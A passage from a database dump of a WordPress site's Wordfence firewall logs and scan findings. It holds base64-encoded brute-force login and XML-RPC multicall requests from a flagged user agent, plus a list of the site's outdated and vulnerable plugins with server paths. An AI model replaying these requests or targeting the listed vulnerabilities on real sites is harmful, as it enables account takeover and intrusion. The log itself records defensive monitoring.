dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(94,1691941986.268600,1691941986.009031,'\0\0\0\0\0\0\0\0\0\0#ru',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc0CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(95,1691942385.700200,1691942385.434225,'\0\0\0\0\0\0\0\0\0\0Ko',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1sb2dpbi5waHAgSFRUUC8xLjEKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMApIb3N0OiBnc3cyMDIzLmNvbQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29ubmVjdGlvbjogY2xvc2UKQ29udGVudC1MZW5ndGg6IDAKCg==\"}'),
(96,1691942387.246500,1691942386.990860,'\0\0\0\0\0\0\0\0\0\0Ko',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(97,1691942389.225900,1691942388.974669,'\0\0\0\0\0\0\0\0\0\0Ko',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc3CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(98,1691942563.901200,1691942563.641203,'\0\0\0\0\0\0\0\0\0\0ɖ-',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"R0VUIC93cC1sb2dpbi5waHAgSFRUUC8xLjEKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMApIb3N0OiBnc3cyMDIzLmNvbQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29ubmVjdGlvbjogY2xvc2UKQ29udGVudC1MZW5ndGg6IDAKCg==\"}'),
(99,1691942565.864600,1691942565.595467,'\0\0\0\0\0\0\0\0\0\0ɖ-',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(100,1691942568.681600,1691942568.416036,'\0\0\0\0\0\0\0\0\0\0ɖ-',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDcyCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}');
/*!40000 ALTER TABLE `dnctiavkr_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfhoover`
--

DROP TABLE IF EXISTS `dnctiavkr_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfhoover`
--

LOCK TABLES `dnctiavkr_wfhoover` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfissues`
--

DROP TABLE IF EXISTS `dnctiavkr_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfissues`
--

LOCK TABLES `dnctiavkr_wfissues` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfissues` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfissues` VALUES
(1,1691937506,1691937506,'new','wfPluginUpgrade',50,'fa87eadc0dc40a64844da80d887b63e9','fa87eadc0dc40a64844da80d887b63e9','The Plugin \"Advanced WordPress Backgrounds\" needs an upgrade (1.10.0 -> 1.11.4).','You need to upgrade \"Advanced WordPress Backgrounds\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:30:\"Advanced WordPress Backgrounds\";s:9:\"PluginURI\";s:0:\"\";s:7:\"Version\";s:6:\"1.10.0\";s:11:\"Description\";s:35:\"Parallax, Video, Images Backgrounds\";s:6:\"Author\";s:35:\"Advanced WordPress Backgrounds Team\";s:9:\"AuthorURI\";s:89:\"https://wpbackgrounds.com/?utm_source=wordpress.org&utm_medium=readme&utm_campaign=byline\";s:10:\"TextDomain\";s:20:\"advanced-backgrounds\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:30:\"Advanced WordPress Backgrounds\";s:10:\"AuthorName\";s:35:\"Advanced WordPress Backgrounds Team\";s:10:\"pluginFile\";s:106:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/advanced-backgrounds/advanced-backgrounds.php\";s:4:\"slug\";s:20:\"advanced-backgrounds\";s:10:\"newVersion\";s:6:\"1.11.4\";s:5:\"wpURL\";s:50:\"https://wordpress.org/plugins/advanced-backgrounds\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(2,1691937506,1691937506,'new','wfPluginUpgrade',50,'6711cf7f3835c3194bfcb1dc14c649f4','6711cf7f3835c3194bfcb1dc14c649f4','The Plugin \"Contact Form 7\" needs an upgrade (5.7.5.1 -> 5.8).','You need to upgrade \"Contact Form 7\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:14:\"Contact Form 7\";s:9:\"PluginURI\";s:25:\"https://contactform7.com/\";s:7:\"Version\";s:7:\"5.7.5.1\";s:11:\"Description\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:6:\"Author\";s:16:\"Takayuki Miyoshi\";s:9:\"AuthorURI\";s:31:\"https://ideasilo.wordpress.com/\";s:10:\"TextDomain\";s:14:\"contact-form-7\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:14:\"Contact Form 7\";s:10:\"AuthorName\";s:16:\"Takayuki Miyoshi\";s:10:\"pluginFile\";s:97:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php\";s:4:\"slug\";s:14:\"contact-form-7\";s:10:\"newVersion\";s:3:\"5.8\";s:5:\"wpURL\";s:44:\"https://wordpress.org/plugins/contact-form-7\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(3,1691937506,1691937506,'new','wfPluginUpgrade',100,'063a8a19897dd9f7f23a2315d9afe6f0','063a8a19897dd9f7f23a2315d9afe6f0','The Plugin \"Elementor\" needs an upgrade (3.12.0 -> 3.15.2).','You need to upgrade \"Elementor\" to the newest version to ensure you have any security fixes the developer has released.','a:27:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:9:\"Elementor\";s:9:\"PluginURI\";s:87:\"https://elementor.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash\";s:7:\"Version\";s:6:\"3.12.0\";s:11:\"Description\";s:145:\"The Elementor Website Builder has it all: drag and drop page builder, pixel perfect design, mobile responsive editing, and more. Get started now!\";s:6:\"Author\";s:13:\"Elementor.com\";s:9:\"AuthorURI\";s:87:\"https://elementor.com/?utm_source=wp-plugins&utm_campaign=author-uri&utm_medium=wp-dash\";s:10:\"TextDomain\";s:9:\"elementor\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:9:\"Elementor\";s:10:\"AuthorName\";s:13:\"Elementor.com\";s:10:\"pluginFile\";s:84:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/elementor/elementor.php\";s:4:\"slug\";s:9:\"elementor\";s:10:\"newVersion\";s:6:\"3.15.2\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/elementor\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/a7bd173c-dc61-4cc6-b42f-311acf728080?source=plugin\";s:9:\"cvssScore\";s:3:\"6.6\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\";}'),
(4,1691937506,1691937506,'new','wfPluginUpgrade',50,'4bc42282c8eed9dd6d7be911d1586510','4bc42282c8eed9dd6d7be911d1586510','The Plugin \"Fonts Plugin | Google Fonts Typography\" needs an upgrade (3.3.7 -> 3.4.3).','You need to upgrade \"Fonts Plugin | Google Fonts Typography\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:38:\"Fonts Plugin | Google Fonts Typography\";s:9:\"PluginURI\";s:51:\"https://wordpress.org/plugins/olympus-google-fonts/\";s:7:\"Version\";s:5:\"3.3.7\";s:11:\"Description\";s:100:\"The easiest to use Google Fonts Plugin. No coding required. Optimized for Speed. 1000+ font choices.\";s:6:\"Author\";s:12:\"Fonts Plugin\";s:9:\"AuthorURI\";s:84:\"https://fontsplugin.com/?utm_source=wporg&utm_medium=readme&utm_campaign=description\";s:10:\"TextDomain\";s:20:\"olympus-google-fonts\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:38:\"Fonts Plugin | Google Fonts Typography\";s:10:\"AuthorName\";s:12:\"Fonts Plugin\";s:10:\"pluginFile\";s:106:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/olympus-google-fonts/olympus-google-fonts.php\";s:4:\"slug\";s:20:\"olympus-google-fonts\";s:10:\"newVersion\";s:5:\"3.4.3\";s:5:\"wpURL\";s:50:\"https://wordpress.org/plugins/olympus-google-fonts\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(5,1691937506,1691937506,'new','wfPluginUpgrade',100,'a7d45017139ce4bcad86b19516d64a7f','a7d45017139ce4bcad86b19516d64a7f','The Plugin \"Give - Donation Plugin\" needs an upgrade (2.25.3 -> 2.32.0).','You need to upgrade \"Give - Donation Plugin\" to the newest version to ensure you have any security fixes the developer has released.','a:27:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:22:\"Give - Donation Plugin\";s:9:\"PluginURI\";s:18:\"https://givewp.com\";s:7:\"Version\";s:6:\"2.25.3\";s:11:\"Description\";s:78:\"The most robust, flexible, and intuitive way to accept donations on WordPress.\";s:6:\"Author\";s:6:\"GiveWP\";s:9:\"AuthorURI\";s:19:\"https://givewp.com/\";s:10:\"TextDomain\";s:4:\"give\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"5.0\";s:11:\"RequiresPHP\";s:3:\"7.0\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:22:\"Give - Donation Plugin\";s:10:\"AuthorName\";s:6:\"GiveWP\";s:10:\"pluginFile\";s:74:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/give/give.php\";s:4:\"slug\";s:4:\"give\";s:10:\"newVersion\";s:6:\"2.32.0\";s:5:\"wpURL\";s:34:\"https://wordpress.org/plugins/give\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/7fa8c406-e64d-4093-a102-436ecfb7dd76?source=plugin\";s:9:\"cvssScore\";s:3:\"6.6\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\";}'),
(6,1691937506,1691937506,'new','wfPluginUpgrade',100,'4d22e917a48299fe0cb5ee472e50ae82','4d22e917a48299fe0cb5ee472e50ae82','The Plugin \"Ivory Search\" needs an upgrade (5.5 -> 5.5.2).','You need to upgrade \"Ivory Search\" to the newest version to ensure you have any security fixes the developer has released.','a:27:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:12:\"Ivory Search\";s:9:\"PluginURI\";s:23:\"https://ivorysearch.com\";s:7:\"Version\";s:3:\"5.5\";s:11:\"Description\";s:152:\"The WordPress Search plugin that includes Search Form Customizer, WooCommerce Search, Image Search, Search Shortcode, AJAX Search & Live Search support!\";s:6:\"Author\";s:12:\"Ivory Search\";s:9:\"AuthorURI\";s:24:\"https://ivorysearch.com/\";s:10:\"TextDomain\";s:18:\"add-search-to-menu\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:12:\"Ivory Search\";s:10:\"AuthorName\";s:12:\"Ivory Search\";s:10:\"pluginFile\";s:102:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/add-search-to-menu/add-search-to-menu.php\";s:4:\"slug\";s:18:\"add-search-to-menu\";s:10:\"newVersion\";s:5:\"5.5.2\";s:5:\"wpURL\";s:48:\"https://wordpress.org/plugins/add-search-to-menu\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/5253fe2b-040b-417c-b257-0cb59ee5aa6e?source=plugin\";s:9:\"cvssScore\";s:3:\"6.1\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\";}'),
(7,1691937506,1691937506,'new','wfPluginUpgrade',100,'8e1499d4a9557e7423b22c16d1595010','8e1499d4a9557e7423b22c16d1595010','The Plugin \"Ivory Search\" needs an upgrade (5.5 -> 5.5.2).','You need to upgrade \"Ivory Search\" to the newest version to ensure you have any security fixes the developer has released.','a:27:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:12:\"Ivory Search\";s:9:\"PluginURI\";s:23:\"https://ivorysearch.com\";s:7:\"Version\";s:3:\"5.5\";s:11:\"Description\";s:152:\"The WordPress Search plugin that includes Search Form Customizer, WooCommerce Search, Image Search, Search Shortcode, AJAX Search & Live Search support!\";s:6:\"Author\";s:12:\"Ivory 